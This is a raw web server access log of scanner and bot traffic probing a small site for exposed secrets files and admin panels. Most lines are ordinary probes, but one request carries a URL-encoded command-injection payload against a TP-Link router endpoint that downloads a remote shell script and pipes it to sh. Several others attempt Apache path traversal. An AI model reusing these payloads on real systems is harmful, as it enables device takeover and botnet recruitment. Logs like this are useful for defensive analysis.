61.111.129.150 - - [03/Jul/2025:05:58:37 +0200] "GET / HTTP/1.1" 200 1229 "https://m.globalticket.melon.com/" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1"
71.6.134.234 - - [03/Jul/2025:05:59:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
134.122.23.130 - - [03/Jul/2025:06:01:40 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
134.122.23.130 - - [03/Jul/2025:06:01:40 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
71.6.134.234 - - [03/Jul/2025:06:02:08 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
87.121.84.130 - - [03/Jul/2025:06:02:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
86.130.167.39 - - [03/Jul/2025:06:10:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello-World/1.0"
43.157.95.131 - - [03/Jul/2025:06:11:26 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
95.214.53.84 - - [03/Jul/2025:06:12:13 +0200] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
176.65.148.203 - - [03/Jul/2025:06:16:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
43.130.67.6 - - [03/Jul/2025:06:17:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
86.54.31.38 - - [03/Jul/2025:06:17:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
86.54.31.38 - - [03/Jul/2025:06:17:13 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
86.54.31.38 - - [03/Jul/2025:06:17:13 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
86.54.31.38 - - [03/Jul/2025:06:17:13 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
86.54.31.38 - - [03/Jul/2025:06:17:14 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
142.93.24.64 - - [03/Jul/2025:06:19:09 +0200] "\x16\x03\x01" 501 318 "-" "-"
142.93.24.64 - - [03/Jul/2025:06:19:09 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
142.93.24.64 - - [03/Jul/2025:06:19:09 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
142.93.24.64 - - [03/Jul/2025:06:19:10 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
142.93.24.64 - - [03/Jul/2025:06:19:10 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.24.64 - - [03/Jul/2025:06:19:10 +0200] "\x16\x03\x01" 501 318 "-" "-"
142.93.24.64 - - [03/Jul/2025:06:19:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
142.93.24.64 - - [03/Jul/2025:06:19:11 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.24.64 - - [03/Jul/2025:06:19:11 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.24.64 - - [03/Jul/2025:06:19:12 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
142.93.24.64 - - [03/Jul/2025:06:19:12 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
146.190.87.89 - - [03/Jul/2025:06:20:36 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
146.190.87.89 - - [03/Jul/2025:06:20:36 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
149.56.150.191 - - [03/Jul/2025:06:21:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.191 - - [03/Jul/2025:06:21:45 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.191 - - [03/Jul/2025:06:21:45 +0200] "GET /sitemap.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.191 - - [03/Jul/2025:06:21:45 +0200] "GET /llms.txt HTTP/1.1" 404 325 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.191 - - [03/Jul/2025:06:21:45 +0200] "GET /security.txt HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.191 - - [03/Jul/2025:06:21:46 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 341 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.191 - - [03/Jul/2025:06:21:46 +0200] "GET /humans.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.191 - - [03/Jul/2025:06:21:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; SM-G981B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.162 Mobile Safari/537.36"
149.56.150.191 - - [03/Jul/2025:06:21:46 +0200] "GET /ads.txt HTTP/1.1" 404 324 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
149.56.150.48 - - [03/Jul/2025:06:22:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Dataprovider.com)"
180.249.211.94 - - [03/Jul/2025:06:22:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
198.235.24.54 - - [03/Jul/2025:06:23:54 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.54 - - [03/Jul/2025:06:23:55 +0200] "\x16\x03\x01" 501 318 "-" "-"
199.45.154.133 - - [03/Jul/2025:06:27:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.133 - - [03/Jul/2025:06:27:17 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.133 - - [03/Jul/2025:06:27:19 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
199.45.154.133 - - [03/Jul/2025:06:27:29 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.133 - - [03/Jul/2025:06:27:31 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
199.45.154.133 - - [03/Jul/2025:06:27:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
199.45.154.133 - - [03/Jul/2025:06:27:36 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
104.215.255.146 - - [03/Jul/2025:06:32:33 +0200] "CONNECT ideas-made-pink-planets.trycloudflare.com:443:443 HTTP/1.1" 400 330 "-" "-"
149.100.11.243 - - [03/Jul/2025:06:32:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
104.215.255.146 - - [03/Jul/2025:06:32:54 +0200] "CONNECT ideas-made-pink-planets.trycloudflare.com:443:443 HTTP/1.1" 400 330 "-" "-"
95.214.53.84 - - [03/Jul/2025:06:35:24 +0200] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
204.76.203.219 - - [03/Jul/2025:06:36:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [03/Jul/2025:06:36:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.84 - - [03/Jul/2025:06:36:35 +0200] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
64.227.44.220 - - [03/Jul/2025:06:36:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
64.227.44.220 - - [03/Jul/2025:06:36:48 +0200] "GET /favicon.ico HTTP/1.1" 404 322 "http://www.mike-pedross.de/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
147.185.132.58 - - [03/Jul/2025:06:37:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
176.65.148.203 - - [03/Jul/2025:06:38:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
86.170.60.157 - - [03/Jul/2025:06:39:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
95.214.53.84 - - [03/Jul/2025:06:40:06 +0200] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
204.76.203.219 - - [03/Jul/2025:06:40:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.134.141.244 - - [03/Jul/2025:06:42:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
87.121.84.130 - - [03/Jul/2025:06:42:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
45.135.194.11 - - [03/Jul/2025:06:43:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F45.8.145.203%2Frondo.sh%7C%7Ccurl%20http%3A%2F%2F45.8.145.203%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
95.214.53.84 - - [03/Jul/2025:06:44:08 +0200] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
141.98.10.162 - - [03/Jul/2025:06:46:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
43.130.40.120 - - [03/Jul/2025:06:47:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
176.65.148.203 - - [03/Jul/2025:06:48:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
204.76.203.219 - - [03/Jul/2025:06:49:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.148.183 - - [03/Jul/2025:06:50:27 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
204.76.203.219 - - [03/Jul/2025:06:50:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [03/Jul/2025:06:53:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.148.183 - - [03/Jul/2025:06:53:55 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
176.65.148.203 - - [03/Jul/2025:06:54:17 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.123.72.134 - - [03/Jul/2025:06:54:27 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
176.65.148.203 - - [03/Jul/2025:06:54:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.123.72.134 - - [03/Jul/2025:06:54:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [03/Jul/2025:06:55:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
204.76.203.219 - - [03/Jul/2025:06:55:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.84 - - [03/Jul/2025:06:59:47 +0200] "PUT /SDK/webLanguage HTTP/1.1" 405 343 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36"
93.123.72.134 - - [03/Jul/2025:07:00:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
77.90.153.48 - - [03/Jul/2025:07:03:08 +0200] "GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1" 404 346 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
77.90.153.48 - - [03/Jul/2025:07:03:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Mobile/15E148 Safari/604.1"
77.90.153.48 - - [03/Jul/2025:07:03:09 +0200] "POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0"
77.90.153.48 - - [03/Jul/2025:07:03:10 +0200] "POST /modules/miniform/ajax_delete_message.php HTTP/1.1" 404 345 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
45.156.129.127 - - [03/Jul/2025:07:04:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:04:27 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:04:42 +0200] "GET /api/session/properties HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [03/Jul/2025:07:04:54 +0200] "GET /index.jsp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [03/Jul/2025:07:05:01 +0200] "GET /login.html HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [03/Jul/2025:07:05:06 +0200] "GET /jasperserver/login.html HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:05:13 +0200] "GET /jasperserver-pro/login.html HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [03/Jul/2025:07:05:19 +0200] "GET /jasperserverTest/login.html HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [03/Jul/2025:07:05:24 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:05:28 +0200] "GET /helpdesk/WebObjects/Helpdesk.woa HTTP/1.1" 404 337 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [03/Jul/2025:07:05:34 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:05:40 +0200] "GET /owncloud/status.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:05:47 +0200] "GET /status.php HTTP/1.1" 404 315 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:05:53 +0200] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:05:53 +0200] "GET /partymgr/control/main HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:00 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:06:00 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:06 +0200] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:07 +0200] "GET /license.txt HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
204.76.203.219 - - [03/Jul/2025:07:06:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.129.127 - - [03/Jul/2025:07:06:12 +0200] "GET /wp-json HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:06:19 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [03/Jul/2025:07:06:19 +0200] "GET /xmldata?item=all HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:19 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [03/Jul/2025:07:06:24 +0200] "GET /OA_HTML/AppsLocalLogin.jsp HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:29 +0200] "GET /zabbix/favicon.ico HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:34 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:06:41 +0200] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:06:47 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:06:47 +0200] "GET /login.do HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [03/Jul/2025:07:06:58 +0200] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:07:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [03/Jul/2025:07:07:04 +0200] "GET /WebInterface/ HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:07:10 +0200] "GET /identity HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.125 - - [03/Jul/2025:07:07:18 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.126 - - [03/Jul/2025:07:07:18 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.127 - - [03/Jul/2025:07:07:18 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:07:19 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.156.129.128 - - [03/Jul/2025:07:07:19 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
